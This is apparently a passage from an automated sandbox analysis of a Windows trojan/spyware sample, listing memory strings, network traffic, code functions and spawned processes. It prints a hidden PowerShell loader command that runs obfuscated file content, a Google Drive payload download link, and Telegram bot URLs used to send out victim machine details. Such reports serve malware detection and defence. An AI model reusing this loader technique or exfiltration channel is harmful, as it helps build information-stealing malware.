          Source: msiexec.exe, 00000006.00000003.2333216796.00000000254A6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.00000000233AC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2628812676.00000000254A5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2333331761.00000000254B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
          Source: msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: powershell.exe, 00000002.00000002.1859059951.0000000004551000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: msiexec.exe, 00000006.00000002.2625379700.00000000232F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: msiexec.exe, 00000006.00000002.2625379700.00000000232F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: msiexec.exe, 00000006.00000002.2625379700.00000000232F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
          Source: msiexec.exe, 00000006.00000002.2625379700.00000000232F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:472847%0D%0ADate%20a
          Source: msiexec.exe, 00000006.00000003.1964825545.00000000006A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
          Source: msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: msiexec.exe, 00000006.00000002.2625379700.00000000233CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: msiexec.exe, 00000006.00000002.2625379700.00000000233C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
          Source: powershell.exe, 00000002.00000002.1874436892.00000000055BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000002.00000002.1874436892.00000000055BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000002.00000002.1874436892.00000000055BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: msiexec.exe, 00000006.00000002.2603668887.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
          Source: msiexec.exe, 00000006.00000002.2603668887.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/l
          Source: msiexec.exe, 00000006.00000002.2623609506.00000000226A0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2603668887.000000000063A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QnMHLeDTHoiU6Y5deHJSRouWaZ-fDANC
          Source: msiexec.exe, 00000006.00000002.2603668887.000000000063A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QnMHLeDTHoiU6Y5deHJSRouWaZ-fDANCO
          Source: msiexec.exe, 00000006.00000002.2603668887.00000000006AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
          Source: msiexec.exe, 00000006.00000002.2603668887.000000000063A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2603668887.000000000069A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.1964825545.00000000006A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QnMHLeDTHoiU6Y5deHJSRouWaZ-fDANC&export=download
          Source: msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: powershell.exe, 00000002.00000002.1859059951.00000000046A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000002.00000002.1874436892.00000000055BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: msiexec.exe, 00000006.00000002.2625379700.00000000232F3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.000000002325C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.00000000232CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: msiexec.exe, 00000006.00000002.2625379700.000000002325C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: msiexec.exe, 00000006.00000002.2625379700.00000000232CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.76
          Source: msiexec.exe, 00000006.00000002.2625379700.0000000023287000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.00000000232F3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.00000000232CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.76$
          Source: msiexec.exe, 00000006.00000003.1964825545.00000000006A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
          Source: msiexec.exe, 00000006.00000003.2333216796.00000000254A6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2625379700.00000000233AC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2628812676.00000000254A5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2333331761.00000000254B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
          Source: msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: msiexec.exe, 00000006.00000003.1964825545.00000000006A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
          Source: msiexec.exe, 00000006.00000003.1964825545.00000000006A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: msiexec.exe, 00000006.00000002.2626954688.0000000024231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: msiexec.exe, 00000006.00000003.1964825545.00000000006A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
          Source: msiexec.exe, 00000006.00000003.1964825545.00000000006A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: msiexec.exe, 00000006.00000002.2625379700.00000000233FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
          Source: msiexec.exe, 00000006.00000002.2625379700.00000000233FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownHTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.10:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.186.65:443 -> 192.168.2.10:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49728 version: TLS 1.2
          Source: C:\Users\user\Desktop\Rundholterne89.exeCode function: 0_2_00405086 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405086

          System Summary

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\Rundholterne89.exeJump to dropped file
          Source: C:\Users\user\Desktop\Rundholterne89.exeCode function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040310F
          Source: C:\Users\user\Desktop\Rundholterne89.exeCode function: 0_2_004048C50_2_004048C5
          Source: C:\Users\user\Desktop\Rundholterne89.exeCode function: 0_2_004064CB0_2_004064CB
          Source: C:\Users\user\Desktop\Rundholterne89.exeCode function: 0_2_00406CA20_2_00406CA2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_043DE2602_2_043DE260
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_043DDFDD2_2_043DDFDD
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06DCC9362_2_06DCC936
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0031C1466_2_0031C146
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0031D2786_2_0031D278
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_003153626_2_00315362
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0031C4686_2_0031C468
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0031C7386_2_0031C738
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0031E9886_2_0031E988
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0031CA086_2_0031CA08
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0031CCD86_2_0031CCD8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_00313E096_2_00313E09
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0031CFAA6_2_0031CFAA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0031F9746_2_0031F974
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_0031E97A6_2_0031E97A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_003169A06_2_003169A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_003129EC6_2_003129EC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_00319DE06_2_00319DE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_00316FC86_2_00316FC8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DF29686_2_25DF2968
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DFFC686_2_25DFFC68
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DF9C186_2_25DF9C18
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DF17A06_2_25DF17A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DF0B306_2_25DF0B30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DF93286_2_25DF9328
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DF1E806_2_25DF1E80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DFDDF16_2_25DFDDF1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DFD9996_2_25DFD999
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DFD9A86_2_25DFD9A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DFD5506_2_25DFD550
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DF95486_2_25DF9548
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DFD5406_2_25DFD540
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DFD0F86_2_25DFD0F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DFD0E96_2_25DFD0E9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DFCC8F6_2_25DFCC8F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DFCCA06_2_25DFCCA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DF00406_2_25DF0040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DF501B6_2_25DF501B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DF00156_2_25DF0015
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DFF8106_2_25DFF810
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DFF8026_2_25DFF802
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DF50286_2_25DF5028
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DF8B916_2_25DF8B91
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DF178F6_2_25DF178F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DFF3B86_2_25DFF3B8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DFF3A86_2_25DFF3A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DF8BA06_2_25DF8BA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DFEF516_2_25DFEF51
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DFEF606_2_25DFEF60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DFEB086_2_25DFEB08
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DF0B206_2_25DF0B20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DFEAF86_2_25DFEAF8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DFE6B06_2_25DFE6B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DFE6A06_2_25DFE6A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DFE2586_2_25DFE258
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DFE2576_2_25DFE257
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DF1E706_2_25DF1E70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_25DFDE006_2_25DFDE00
          Source: Rundholterne89.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/14@6/6
          Source: C:\Users\user\Desktop\Rundholterne89.exeCode function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040310F
          Source: C:\Users\user\Desktop\Rundholterne89.exeCode function: 0_2_00404352 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404352
          Source: C:\Users\user\Desktop\Rundholterne89.exeCode function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,0_2_0040205E
          Source: C:\Users\user\Desktop\Rundholterne89.exeFile created: C:\Users\user\AppData\Roaming\underarmsmusklensJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
          Source: C:\Users\user\Desktop\Rundholterne89.exeFile created: C:\Users\user\AppData\Local\Temp\nsr6A1.tmpJump to behavior
          Source: Rundholterne89.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Users\user\Desktop\Rundholterne89.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Rundholterne89.exeReversingLabs: Detection: 42%
          Source: C:\Users\user\Desktop\Rundholterne89.exeFile read: C:\Users\user\Desktop\Rundholterne89.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Rundholterne89.exe "C:\Users\user\Desktop\Rundholterne89.exe"
          Source: C:\Users\user\Desktop\Rundholterne89.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Ungarnsopholdet197=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205';$Ratanhia=$Ungarnsopholdet197.SubString(55438,3);.$Ratanhia($Ungarnsopholdet197)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
          Source: C:\Users\user\Desktop\Rundholterne89.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Ungarnsopholdet197=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205';$Ratanhia=$Ungarnsopholdet197.SubString(55438,3);.$Ratanhia($Ungarnsopholdet197)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Rundholterne89.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
